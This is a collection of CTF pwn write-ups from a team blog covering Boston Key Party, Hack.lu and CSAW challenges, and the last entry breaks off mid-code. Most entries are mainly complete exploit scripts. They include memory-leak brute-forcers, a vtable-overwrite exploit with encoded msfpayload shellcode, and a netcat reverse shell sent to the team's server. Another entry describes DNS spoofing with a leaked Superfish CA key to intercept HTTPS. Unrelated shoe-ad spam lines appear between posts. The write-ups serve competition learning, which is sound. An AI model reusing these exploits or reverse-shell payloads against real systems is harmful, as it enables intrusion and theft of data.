BalalaikaCr3w - pwn

Kendall (pwn - 300)

Dor1s — Mon, 02 Mar 2015 11:00:58 +0000

Category:

Event:

Boston Key Party 2015

Description of task is pretty small:

52.0.164.37:8888

And link to file (ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, stripped).

Solution

After connecting to the server we receive the following menu:

#####################################################
# DHCP Management Console                           #
# Auditing Interface                                #
#####################################################

 h  show this help
 a  authenticate
 c  config menu
 d  dhcp lease menu
 e  exit

[m]#

authenticate - stage for inputting administrator's password

config menu:

[c]# h

 h  show this help
 l  list keys/values
 s  change start ip
 e  change end ip
 k  change netmask ip
 n  change nameserver ip
 m  return to main menu
[c]# l
 DHCP Configuration: 
	Start IP:   192.168.000.100
	End IP:     192.168.000.200
	Netmask:    255.255.255.000
	Nameserver: 8.8.8.8

dhcp lease menu:

[d]# h

 h  show this help
 r  renew leases
 l  list leases
 f  filter leases
 m  return to main menu

Ok, we've got some sort of router's management console. But anyway the task's type is pwn and we've got the binary, so...

Surely we should reverse the binary and find some vulnerable stuff there!

After investigation of the binary we notice that all input reading is done into global buffer s2 which size is exatcly 128 bytes:

Hope you've already noted that the buffer followed by global variable containing current user status - administrator or not. I called it adminFlag. The only legal way to change that flag is through authenticate menu. Authentication served by the following function:

And it looks pertty safe. But if we try to understand how reading input function works:

We see that there is a off by one error. Fortunately it is byte of adminFlag which should be zero'ed to escalate our access rights. So for escalation to administrator we need:

find call to sub_400EA6() with argument length >= 128
write 128 bytes followed '\n' to make 129th byte to be zero

Jumping to xrefs of sub_400EA6()function we find one place where it is called with argument's value of 128:

Nice! It is filter leases stage of dhcp lease menu we saw above. Well, exploit for rights escalation is easy and small:

doris$ python -c "open('pl', 'wb').write('d\n' + 'f\n' + 'A' * 128 + '\n')"
doris$ cat pl - | nc 52.0.164.37 8888
#####################################################
# DHCP Management Console                           #
# Auditing Interface                                #
#####################################################

 h  show this help
 a  authenticate
 c  config menu
 d  dhcp lease menu
 e  exit

[m]# [d]# Enter filter condition: [d]$

BOOM! We became the administrator. Sadly, it does not give us any flag. Task worths 300 points, by the way, so it should not be so easy. As administrator now we have another possibilities in context of service. Now we are able to:

not only list but also change DHCP configuration:

[c]$ l
 DHCP Configuration: 
	Start IP:   192.168.000.100
	End IP:     192.168.000.200
	Netmask:    255.255.255.000
	Nameserver: 8.8.8.8
[c]$ s
Current Value: 192.168.000.100
New Value: asd
Your input asd cointains invalid characters. Only digits and dots allowed!

and now we can execute renew leases action:

OMG! It is pure system() call with string which is coltrolled by us (arguments for sprintf are IP addresses of DHCP config).

Sadly again, but it is not so easy. It is BKP CTF's task for 300 points, remember?

Function for processing DHCP settings update called for each IP address we input:

it has some small bugs, but anyway we can not provide any useful payload for system() call - only digits and dots are really allowed.

Further investigation of the binary did not give any other exploitable vulnerabilities. We were really stucked, because it is pwn task and usually we expect some serious binary exploitation, even hardcore exploitation because of 300 points.

Later, when we finally understand that there is nothing to do with the binary we return back to:

Fuzzing DHCP settings we try to set up DNS IP for our own server's address. Then listen for anything incoming traffic there:

root@evildns:/tmp# tcpdump -n dst port 53
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
12:27:44.272585 IP 52.0.164.37.52440 > 188.166.48.175.53: 26405+ A? yandex.ru. (27)

Stop please...

We received DNS query for russian leading search engine hostname?

That is really suprisingly and a little bit unbeliviable, because CTF is hosted by BostonKeyParty team from USA, but that is true. Looks like time for some DNS Spoofing have come:

Honestly, yandex.ru is not the only hostname queried from task's service (52.0.164.37). Then it queries for my.bank domain.

After spoofing yandex.ru address we tried to listen 80 port on our server but did not receive any traffic. After solving the challenge we have known from task author that we should receive HTTP-request at 80 port, but honestly we did not receive this.

One of the ways to go further is to setup dnsmasq service:

root@evildns:/tmp# dnsmasq --no-daemon --log-queries
dnsmasq: started, version 2.62 cachesize 150
dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack
dnsmasq: reading /etc/resolv.conf
dnsmasq: using nameserver 209.244.0.3#53
dnsmasq: using nameserver 8.8.8.8#53
dnsmasq: using nameserver 8.8.4.4#53
dnsmasq: read /etc/hosts - 8 addresses
dnsmasq: query[A] yandex.ru from 52.0.164.37
dnsmasq: forwarded yandex.ru to 8.8.4.4
dnsmasq: forwarded yandex.ru to 8.8.8.8
dnsmasq: forwarded yandex.ru to 209.244.0.3
dnsmasq: reply yandex.ru is 213.180.204.11
dnsmasq: reply yandex.ru is 93.158.134.11
dnsmasq: reply yandex.ru is 213.180.193.11
dnsmasq: query[A] yandex.ru from 52.0.164.37
dnsmasq: cached yandex.ru is 213.180.193.11
dnsmasq: cached yandex.ru is 93.158.134.11
dnsmasq: cached yandex.ru is 213.180.204.11
dnsmasq: query[A] my.bank from 52.0.164.37
dnsmasq: /etc/hosts my.bank is 188.166.48.175

Dump all traffic after set up of dnsmasq and then try to find incoming connection:

It is coming to port 443... Okay. Let's process it, hope the final is close!

root@evildns:/tmp# nc -lvvv -p 443
listening on [any] 443 ...
connect to [188.166.48.175] from ec2-52-0-164-37.compute-1.amazonaws.com [52.0.164.37] 50092
?<ؠ<??5?_? ?,?E?y?]?^`g'i\??0?,?(?$??
??kj98???2?.?*?&???=5???
?/?+?'?#??	??g@32??ED?1?-?)?%???</?A???
                                            ??m

42

	
 ^C sent 0, rcvd 289

Looks like SSL Client Hello packet. Come on! This task costs just a 300 points!

Looks like we have to set up HTTPS server, let's do this. I'm sure there are many scripts and light-weight servers for such task, but I had nginx installed and decided to process HTTPS with it.

Create self-signed certificate:

root@evildns:/etc/nginx# openssl genrsa -out my.bank.key 2048
Generating RSA private key, 2048 bit long modulus
............................................................................+++
............+++
e is 65537 (0x10001)
root@evildns:/etc/nginx# openssl req -new -sha1 -key my.bank.key -out my.bank.csr
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
State or Province Name (full name) [Some-State]:
Locality Name (eg, city) []:
Organization Name (eg, company) [Internet Widgits Pty Ltd]:
Organizational Unit Name (eg, section) []:
Common Name (e.g. server FQDN or YOUR name) []:my.bank
Email Address []:

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
An optional company name []:
root@evildns:/etc/nginx# openssl x509 -req -days 365 -in my.bank.csr -signkey my.bank.key -out my.bank.crt
Signature ok
subject=/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd/CN=my.bank
Getting Private key

and set up nginx for HTTPS with that cert:

server {
        listen          443 ssl;

        ssl_certificate         my.bank.crt;
        ssl_certificate_key     my.bank.key;
        ssl_protocols       TLSv1 TLSv1.1 TLSv1.2;
        ssl on;
        ssl_session_timeout 5m;
        ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv3:+EXP;
        ssl_prefer_server_ciphers on;

        root /data/www;

        location = / {
                index index.html;
        }

        location / {
                default_type "text/html";
                try_files $uri $uri.html;
        }
}

Let's look into traffic again. Hope there should be the flag now!

root@evildns:/etc/nginx# tail -f /var/log/nginx/access.log 
<...>
52.0.164.37 - - [28/Feb/2015:16:43:02 +0400] "-" 400 0 "-" "-"

Come on! Where is the flag? We have already even set up HTTPS, WTF?

Unknown CA? Of course it is unknown! Where should we get trusted CA who would sign certificate for my.bank domain?

Our my.bank certificate is self-signed without any CA. Later we tried to create root CA self-signed certificate and sign my.bank cert with root CA's one. It did not help.

As we have known from task's author after solving the task, HTTP request to yandex.ru contained hint about this stage. But as I wrote above about yandex.ru we did not receive any incoimng connection at 80 port when spoofed yandex.ru domain.

However if you follow the news about Information Security you should hear about leaked Superfish Inc. certificate (and corresponding pre-installed backdoors in lenovo laptops). More info from Errata Security blog, for example.

Let's try to sign our my.bank certificate by Superfich Inc:

root@evildns:/etc/nginx# openssl x509 -req -days 365 -in my.bank.csr -CAkey super.pem -CA super.crt -out supermy.bank.crt
Signature ok
subject=/C=AU/ST=Some-State/O=Internet Widgits Pty Ltd/CN=my.bank
Getting CA Private Key
Enter pass phrase for super.pem:

dnd listen for incoming requests again:

root@evildns:/etc/nginx# tail -f /var/log/nginx/access.log 
<...>
52.0.164.37 - - [28/Feb/2015:13:44:53 +0000] "GET /login/username=FLG-SIK9KSRBHIYUKNGEBXlKW3B7HS2I HTTP/1.1" 404 168 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0"

I'm happy to say that username from request is the flag!

Flag: FLG-SIK9KSRBHIYUKNGEBXlKW3B7HS2I

Afterwords

This task is awesome. My teammates and I enjoyed it too much when fully understood how to solve it.

Task and its author are praiseworthy for all these interesting hacking steps which must be done to solve tasks. But not only for that. This is amazing example of how dangerous information technologies are nowadays for general users. Even for all users, I think.

Thank you BostonKeyParty and respect for such challenge!

Overview of task from its author: http://mweissbacher.com/blog/2015/03/01/boston-key-party-2015-kendall-challenge-superfish/

Flag: FLG-SIK9KSRBHIYUKNGEBXlKW3B7HS2I

Asics shoes | Women's Nike nike roshe heart and sole shoes for women Shadow trainers - Latest Releases , Ietp

Attachments:

kendall.tar_.gz

Guess the Flag (Exploit - 200)

Dil4rd — Thu, 23 Oct 2014 14:46:42 +0000

Category:

pwn

Event:

Hack.lu CTF Quals 2014

Description:

Look at that guy over there! He's a bandit from the group that robs the stagecoaches in unpredictable intervals. I think he hasn't been with them for very long, so he can't tell whether you're one of them. Try to look like a bandit and talk to him. He probably won't just tell you their plan for the attack, but maybe you can ask him some questions?

Download
nc wildwildweb.fluxfingers.net 1412

Solution:

So we have source code and binary. One look is enough to notice a strange thing in function is_flag_correct: obviously constant global varibales bin_by_hex and flag defined localy! Now we can concentrate in searching vuln and find it in function is_flag_correct:

    char value1 = bin_by_hex[flag_hex[i*2  ]];
    char value2 = bin_by_hex[flag_hex[i*2+1]];

where flag_hex is a user controlled array on signed bytes! So we can access memory out of array bin_by_hex.

In binary we see that we can access flag variable in stack:

So exploitation idea is to send flag of next type:

sendFlag = known_flag_part + "%02x"%(brute_byte)
sendFlag += ''.join([hex_by_pass_el_index(i) for i in range(len(sendFlag),50)])

where hex_by_pass_el_index(i) gives two bytes that cause program to fetch i-th element of original flag. And we get success message when brute_byte is valid and fail message otherwise.

Here is the full exploit code:

import string
import socket
ERR_SUCCESS = 0
ERR_CONNECT = -1
ERR_INVALID_FLAG = -2

host = 'wildwildweb.fluxfingers.net'
port = 1412
def hex_by_pass_el_index(i):
	return '0'+chr(0xC0+i)
def build_hex_pass_guesser(p):
	r = ''
	for i in range(len(p)):
		if p[i]!=None:
			r += "%02x"%(ord(p[i]))
		else:
			r += hex_by_pass_el_index(i)
	return r

def is_valid(s,p):
	buf = s.recv(10000)
	if 'guess' not in buf:
		return ERR_CONNECT
	s.send(p+'\n')
	buf = s.recv(10000)
	if 'Nope' not in buf:
		return ERR_SUCCESS
	else:
		return ERR_INVALID_FLAG

def brute(alph = string.printable):
	s = None
	p = [None]*50
	for k in range(5,len(p)-1):
		i=0
		while True:
			if s==None:
				s = socket.create_connection((host,port))
				s.settimeout(5)
				s.recv(50000)
			p[k] = alph[i]
			my_hex_pass = build_hex_pass_guesser(p)
			bVal = is_valid(s,my_hex_pass)
			#print(k,i,p,bVal)
			if bVal==ERR_SUCCESS:
				break
			if bVal==ERR_CONNECT:
				s.close()
				s=None
			if bVal==ERR_INVALID_FLAG:
				i += 1
		print(p)
	return p

print(''.join(brute()))

And the flag is: flag{6974736a7573746c696b65696e7468656d6f76696573}

Authentic Sneakers | Men’s shoes

Personnel Database (Exploit - 150)

Triff — Thu, 23 Oct 2014 12:24:46 +0000

Category:

pwn

Event:

Hack.lu CTF Quals 2014

Task:

Lots of criminals in this area work for one big boss, but we have been unable to determine who he is. We know that their organization has one central personnel database that might also contain information about their boss, whose username is simply “boss”. However, when you register in their system, you only get access level zero, which is not enough for reading data about the boss - that guy is level 10. Do you think you can get around their protections?

nc wildwildweb.fluxfingers.net 1410

Note: The users dir will be wiped every 5 minutes

And a .c file attached (attached to write-up below)

Solution:

It's very simple challenge, so i wouldn't explain how server works. You can figure it out by yourself if you take a closer look at provided source file.

What should we do? We have to find out who is the boss. In this system each user has decription, so we have to read boss'es description. But we can only read description of users with level lesser then ours and we have level 0, and boss has level 10, so we have to promoted our user to level 11 or more and read boss till the end=) let's pwn:

Vulnarable parts:

struct userdata *read_userfile(char *user) {
  struct userdata *res = calloc(1, sizeof(*res));
  if (res == NULL) return NULL;
  int fd = open_userfile(user, O_RDONLY);
  if (fd == -1) return NULL;
  FILE *f = fdopen(fd, "r");
  if (f == NULL) { close(fd); return NULL; }
  char line[256];
  while (fgets(line, sizeof(line), f)) {
    rtrim(line);
    char *key = line;
    char *eqsign = strchr(line, '=');
    if (!eqsign) continue;
    *eqsign = '\0';
    char *value = eqsign+1;

    if (!strcmp(key, "hash")) res->hash = atoll(value);
    else if (!strcmp(key, "access_level")) res->access_level = atoi(value);
    else if (!strcmp(key, "description")) strcpy(res->description, value);
    else printf("fatal error: bad key \"%s\" in config, aborting\n", key), exit(1);
  }
  return res;
}

and:

struct userdata {
  uint32_t hash;
  unsigned int access_level;
  char description[512];
};

.....

  char username[21] = "";
  struct userdata *ud = NULL;
  bool logged_in = false;

  char line[512]; /* last incoming command */
  while (printf("> "), fgets(line, sizeof(line), stdin)) {
    rtrim(line);
    char *cmd = line;
    char *params = strchr(line, ' ');
    if (params) {
      *params = '\0';
      params++;
    }

.....

if (!strcmp(cmd, "set_description")) {
      if (!logged_in) { printf("you must be logged in for this\n"); continue; }
      if (!params) { printf("missing description\n"); continue; }
      strcpy(ud->description, params);
      printf("description set\n");
    }

When you perform 'logout' command, your userfile will be written on disk and on login it will be read again. You can notice, that description field has 512 bytes length, command that you can perfom has same 512-bytes length, but system reads userfile by 256-bytes in cycle. So we can overflow decription and in will be splitted in two fields in userfile, cos no checksum used we can rewrite access_level (description is read after access level), including "access_level=11" in description.

So just register, set description, logout, login and pwn boss! (it become even more easy, cos server will notify you if he meets wrong field in userfile, so he helps you to make injection in it).

Exploit:

import socket
from time import sleep

s = socket.socket()
s.connect(('wildwildweb.fluxfingers.net', 1410))

username = 'balalaika2'
password = 'skjdgfksgi'

print s.recv(1024)
s.send("register " + username + ':' + password + '\n')
sleep(0.5)

print s.recv(1024)
s.send("set_description aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaccess_level=11\n")
sleep(0.5)

print s.recv(1024)
s.send("logout\n")
sleep(0.5)

print s.recv(1024)
s.send("user "+ username+ "\n")
sleep(0.5)

print s.recv(1024)
s.send("pass " + password + "\n")
sleep(0.5)

print s.recv(1024)
s.send("whois boss\n")
sleep(0.5)

print s.recv(1024)

This script produces following output:

user created successfully

description set

Uh, who are you again? I have forgotten.

username accepted, please provide password

login ok

user	boss
level	10
descr	"flag{this_is_why_gets_is_better_than_fgets}"

And the flag is flag{this_is_why_gets_is_better_than_fgets}

spy offers | Jordan

Attachments:

personnel_database_server.zip

solver.py_.zip

ish (pwn 300)

Dil4rd — Wed, 01 Oct 2014 20:37:58 +0000

Category:

pwn

Event:

CSAW CTF Quals 2014

In this task we have x86 ELF binary ish, which has been run at 54.208.86.14 9988.

This binary is one more Unix shell, but with few commands avaliable:

There is only two intresting commands: lotto and login.

lotto

This command offer you to play in usual guess the number game but with only one attempt. Firstly you choose the number from 1 to 4. Lets name it as N.Then program generates N random numbers and asks you to enter right N numbers. If you entered the same numbers as were generated, you will get message 'You win!', but if you failed:

So, it always prints 4 numbers, but only N of them were set at this function. Because RandomGeneratedNumberArray initialized on stack, this fact means that we can read stack. Futhermore we can enter N equals zero and read 16 bytes from stack. It's definetly vulnerability, but there seems nothing intersting at that location on the stack.. may be it will be usefull later.

login

This command allows you to enter freely as any user except root. If you will try to login as root, program asks you to enter password (valid password takes from file "key").

The first intresting thing in this function is:

This means that program has stack buffer variable of fixed size, receive user name to this buffer and then uses stack allocation to get new buffer (allocated buffer then uses to store user name). This approach isn't vulnerability, but it's very very strange:

if user name length restricted to some small border (256 bytes is a really small size), why don't you use stack buffer of fixed size? It will work faster!
if you care about stack size, why don't you use heap? (because stack allocation is faster? ok...)
if you want to use stack in more effective manner, why don't you round user name length up to 4 bytes (normal stack alignment for x86 systems), but up to 16?
and so on

The right answer is "Without this stack allocation, vulnerability in lotto function allows you to read only 16 bytes only from fixed place. Using this stack allocation you can read stack of any function from list of commands."

Now we just have to find command with something intresting on stack.. and it's login function again!

As you can see from decompiled code above, when you try to login as root, program reads file 'key' with root's password to the static stack buffer. And everything is ok, but root's password erased from this buffer only if you will enter data of length from 1 to 61.

So to retrive root's password we should:

login as anyone except root
login with short user name
login as root
enter password of size 62
exit from user with short user name
login with long enough user name
play lotto
enter 0 (to set N=0)
get 16 bytes of root's password
exit
if no all root's password has been read, go to 2.
exit

Now everything you need is to find proper difference between long and short user names, which allows you to read root's password (root's password was the flag for this challenge).

Our full exploit:

#!/usr/bin/python
from socket import create_connection
from time import sleep
from struct import pack

FLAG = ''

def getPart(n):
	s = create_connection(('54.208.86.14', 9988))

	sleep(0.3)
	print s.recv(1024)
	p = 'aaa\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'login\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'oooo\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'login\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'root\x00\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'exit\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'login\n'
	print p
	s.send(p)

	sleep(0.3)
	print s.recv(1024)
	p = 'A' * (69 - (0x10 * n)) + '\n'
	print p
	s.send(p)

	sleep(0.5)
	print s.recv(1024)
	p = 'lotto\n'
	print p
	s.send(p)

	for i in xrange(0, 5, 1):
		sleep(0.3)
		print s.recv(1024)
		p = '\n'
		print p
		s.send(p)

	sleep(1)
	numbers = s.recv(1024)
	print numbers
	numbers = numbers.split('\n')
	numbers = numbers[2]

	numbers = numbers.replace(' ', '')
	print numbers
	numbers = numbers.split(',')
	print numbers
	flag = ''
	for i in numbers: flag += pack('<I', int(i))

	print flag

	s.close()

	return flag


for i in xrange(0, 4, 1):
	FLAG += getPart(i)

print 'FLAG:'
print FLAG

The flag is: flag{AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOXX}

Sportswear free shipping | New Releases Nike

s3 (pwn 300)

Dil4rd — Wed, 01 Oct 2014 20:36:35 +0000

Category:

pwn

Event:

CSAW CTF Quals 2014

Task description gives us only service ip, port (54.165.225.121 and 5333 respectively) and binary, named s3.

$ file s3
s3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0xe99ee53d6922baffcd3cecd9e6b333f7538d0633, stripped

As we can see from welcome message it's string storage service:

Welcome to Amazon S3 (String Storage Service)

    c <type> <string> - Create the string <string> as <type>
                        Types are:
                            0 - NULL-Terminated String
                            1 - Counted String
    r <id>            - Read the string referenced by <id>
    u <id> <string>   - Update the string referenced by <id> to <string>
    d <id>            - Destroy the string referenced by <id>
    x                 - Exit Amazon S3

Lets take a look at create string function. According to asm code, two string container types can be created:

container of type 0 is just normal C-like string representation, created on the heap by command "new".
container of type 1 is a class, which can be represented as structure struct_strContainerType1 (shown below). Vtable contains 3 functions. Also created on heap.

#pragma pack(push, 8)
struct struct_strContainerType1 {
  void* vtable;
  __int32 strLength;
  void* pStr;
};
#pragma pack(pop)

Created string container's address placed into structure:

#pragma pack(push, 8)
struct struct_strStorage {
  unsigned __int64 strId;    //pointer to string container
  __int32 strContainerType;  //container type (0 or 1)
  void* pStrContainer;       //pointer to string container
};
#pragma pack(pop)

It should be methioned one more time that strId is an address of string's container, e.i. address of created string if string type is 0 and address of class struct_strContainerType1 if string type is 1.

At the end of this fucntion structure struct_strStorage placed to the global vector.

In read string function we see that it searches for string with requested ID, checks it's container type and ...

...a very strange behavior if container type equal 1: function creates useless duplicate. But it's not a vulnerable bag(

Now lets take a look at update string function.First thing we can notice is an absence of string container type check..

This means that it interpretes string container of any type as string container of type 0 (e.i. as normal C-like string)! So we can override struct_strContainerType1.vtable by any data with two restrictions: it should have no 0x0a and 0x00 bytes.

Now we have found vulnerability, which allow us to run code from almost arbitrary address. The only thing we should recognize: where can we put our shellcode (libc's function system isn't imported). Fortunately heap is REW accessible:

$ cat /proc/16988/maps
00400000-00406000 r-xp 00000000 08:01 264539                             /home/user/s3
00605000-00606000 r-xp 00005000 08:01 264539                             /home/user/s3
00606000-00607000 rwxp 00006000 08:01 264539                             /home/user/s3
01926000-01947000 rwxp 00000000 00:00 0                                  [heap]
...

So here is my exploit (code is ugly, but it works):

import re
import time
import socket
from struct import *

host = "54.165.225.121"
port = 5333

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.settimeout(5)

def read_str(stId):
	s.recv(1024)
	sBuf = "r {0}".format(stId)
	s.send(sBuf+'\n')
	return s.recv(2014)

def create_str(tp,st):
	s.recv(1024)
	sBuf = "c {0} {1}".format(tp,st)
	s.send(sBuf+'\n')
	buf= s.recv(1024)
	return int(re.findall('\d+',buf)[0])

def update_str(stId,st):
	s.recv(1024)
	sBuf = "u {0} {1}".format(stId,st)
	s.send(sBuf+'\n')
	buf = s.recv(1024)
	return int(re.findall('\d+',buf)[0])

def delete_str(stId):
	s.recv(1024)
	sBuf = "d {0}".format(stId)
	s.send(sBuf+'\n')
	return s.recv(1024)

buf = s.recv(1024)

# msfpayload linux/x64/exec CMD="whoami; sh" R | msfencode -b \x00\x10 -e x64/xor -t python 
#[*] x64/xor succeeded with size 95 (iteration=1)
buf =  ""
buf += "\x48\x31\xc9\x48\x81\xe9\xf9\xff\xff\xff\x48\x8d\x05"
buf += "\xef\xff\xff\xff\x48\xbb\x27\x32\xdc\x60\xca\x39\x2e"
buf += "\x23\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4"
buf += "\x4d\x09\x84\xf9\x82\x82\x01\x41\x4e\x5c\xf3\x13\xa2"
buf += "\x39\x7d\x6b\xae\xd5\xb4\x4d\xa9\x39\x2e\x6b\xae\xd4"
buf += "\x8e\x88\xc1\x39\x2e\x23\x50\x5a\xb3\x01\xa7\x50\x15"
buf += "\x03\x54\x5a\xdc\x36\x9d\x71\xa7\xc5\x28\x37\xdc\x60"
buf += "\xca\x39\x2e\x23"

#put shellcode to heap and get it's address
myCode = create_str(0,buf)
print('myCode = '+hex(myCode))

#create fake vtable
badBuf = 'A'*0x10+ pack("<Q",myCode)
pVtable = create_str(0,badBuf)
print('pVtable = '+hex(pVtable))

#create string container of type 1
pObj = create_str(1,'a'*0x20)
print('pObj = '+hex(pObj))

#update string container of type 1 and replace original vtable by fake vtable
badBuf = pack("<Q",pVtable)*8
myId3 = update_str(pObj,badBuf)
print('myId3 = '+hex(myId3))

#trigger vulnerability and try to run shellcode
print(read_str(myId3).__repr__())

# bash!
while True:
	s.send(raw_input('$ ')+'\n')
	print(s.recv(1024))

s.close()

Unfortunately I don't save flag anywhere... but I remember that it was at home/amazon/flag, belive me;)

Running sport media | Air Jordan Release Dates Calendar

xorcise (exploit 500)

Dor1s — Thu, 25 Sep 2014 12:26:12 +0000

Category:

pwn

Event:

CSAW CTF Quals 2014

We've got the following binary and its source code: xorcise.

$ file xorcise
xorcise: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked 
(uses shared libs), for GNU/Linux 2.6.32, not stripped

Looking attentively at source code you can find this interesting moment in decipher function:

#define BLOCK_SIZE 8
#define MAX_BLOCKS 16

uint32_t decipher(cipher_data *data, uint8_t *output)
{
    uint8_t buf[MAX_BLOCKS * BLOCK_SIZE];   //128 
    uint32_t loop;
    uint32_t block_index;
    uint8_t xor_mask = 0x8F;

    memcpy(buf, data->bytes, sizeof(buf));
    if ((data->length / BLOCK_SIZE) > MAX_BLOCKS)
    {
        data->length = BLOCK_SIZE * MAX_BLOCKS;
    }

    for (loop = 0; loop < data->length; loop += 8)
    {
        for (block_index = 0; block_index < 8; ++block_index)
        {
            buf[loop+block_index]^=(xor_mask^data->key[block_index]);
        }
    }
    memcpy(output, buf, sizeof(buf));
}

Also you can get it looking at disasm or decompiled code:

I managed to find it firstly in C-source. So it looks like we can run loop for 8 additional bytes after the buffer buf because data->length is fully controlled by us. We just need to send data->length in range from 0x81 to 0x87. In this case external loop (with index variable loop) will run one more time and internal loop will rewrite other variables on the stack.

After looking at disassembler and some debugging in gdb we distinguished the following stack structure:

128 bytes of buf array

1 byte for xor_mask

4 bytes of block_index

4 bytes of loop

Not bad, we can overwrite xor_mask, block_index and 3 least significant bytes of loop. But when we corrupt block_index variable we are falling info infinite loop or breaking out of loop immediately.

After some analysis of memory addresses in the binary we understand another promising possibility.

We can set xor_mask to 0x00, then do not corrupt block_index (because it should be in range from 0 to 8 for loop execution) and then we set least significant byte of variable loop in such way that buf[loop + block_index] becomes reference for return address! Great! Go back to binary for searching best place for jump to.

Yeah...

So if we jump to 0x080492E9 from decipher, we will have on the stack the following data:

    size_t bytes_read;
    cipher_data encrypted;
    uint8_t decrypted[128];
    request *packet;
    uint32_t authenticated;

    memset(&encrypted, 0, sizeof(encrypted));
    memset(&decrypted, 0, sizeof(decrypted));

    bytes_read = recv(sockfd, (uint8_t *)&encrypted, sizeof(encrypted), 0);
    if (bytes_read <= 0)
    {
        printf("Error: failed to read socket\n");
        return -1;
    }

    if (encrypted.length > bytes_read)
    {
        printf("Error: invalid length in packet\n");
        return -1;
    }

    decipher(&encrypted, decrypted);

Address of encrypted buffer which is fully contolled by us. Excellent!

Data of encrypted is formed in the following way:

struct cipher_data
{
    uint8_t length;
    uint8_t key[8];
    uint8_t bytes[128];
};

- length should be in range from 0x81 to 0x87;

- key we suggest to be {xor_mask, 0x00, 0x00, 0x00, 0x00, offset_to_ret_addr, mask_for_lsb_of_ret_addr, mask_for_2nd_bytes_of_ret_addr} but zero-bytes will terminate our buffer for system(). So we can set xor_mask to 0x20 (space character), then all following bytes will be xored with 0x20 and null-characters become spaces.

- key[5] must be (16 + 3) because return address is offseted by 16 bytes from loop index on the stack. +3 should be added because we are going to modify least significant byte of loop in such way to get least significant byte of return address on next iteration of loop.

- key[6:7] must be 0x9194 ^ 0x92e9 = 0x037d - return address of normal execution flow xored with address of "call system" and xored with 0x20 of course.

- in bytes we can send our payload for system() call, just start it with ";" to cut off all first inpropriate bytes:

;/bin/nc -e /bin/sh <BALALAIKACR3W_EVIL_SERVER_IP> 16969

And now full exploit looks:

#!/usr/bin/python
from socket import create_connection
from struct import pack, unpack

L = '\x87' #length
xor = 0x20
k6 = 0x13
packet = L
packet_str = '\x00' * 5 + chr(k6) + '\x7D\x03'
for c in packet_str:
	packet += chr( xor ^ ord(c))

pl = ';/bin/nc -e /bin/sh <BALALAIKACR3W_EVIL_SERVER_IP> 16969\x00'
padding = 'A' * (128 - len(pl))
packet += pl + padding

s = create_connection(('128.238.66.227', 24001))
s.send(packet)
print s.recv(1024)

s.close()

Now just do something like that on our EVIL SERVER and wait for backconnect:

$ nc -lvvv -p 16969
listening on [any] 16969 ...
128.238.66.227: inverse host lookup failed: Unknown server error : Connection timed out
connect to [BALALAIKACR3W_EVIL_SERVER_IP] from (UNKNOWN) [128.238.66.227] 45427

ls -la
total 44
drwxr-xr-x 2 root root  4096 Sep 20 00:18 .
drwxr-xr-x 3 root root  4096 Sep 14 14:14 ..
-rw-r--r-- 1 root root    30 Sep 20 00:18 flag.txt
-rw-r--r-- 1 root root     7 Sep 12 19:13 password.txt
-rwxr-xr-x 1 root root 12308 Sep 12 19:08 xorcise
-rw-r--r-- 1 root root 10248 Sep 10 13:16 xorcise.c
cat flag.txt
flag{code_exec>=crypto_break}
cat password.txt
pass123

Flag is flag{code_exec>=crypto_break}

Sports Shoes | NIKE HOMME

Attachments:

xorcise.zip

Explicit (pwn 500)

Dil4rd — Mon, 22 Sep 2014 22:44:15 +0000

Category:

pwn

Event:

No cON Name CTF Quals 2014

The task was to find vulnerability in binary service explicit (binary and exploit). Like other tasks at this CTF, this one was easy enouth.

After downloading file and opening it in IDA I'd found that it's x86 ELF which has no imported functions. Unfortunately Hex-Rays FLIRT didn't help me that time, but x86 decompiler works fine and few minutes was enouth to reconstruct main function and identify high level apis. Result I've got is the next:

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v3; // eax@1
  char *v4; // edx@8
  int v5; // ecx@12
  int result; // eax@12
  int v7; // [sp+4h] [bp-114h]@1
  char *v8; // [sp+8h] [bp-110h]@3
  char v9[256]; // [sp+Ch] [bp-10Ch]@2
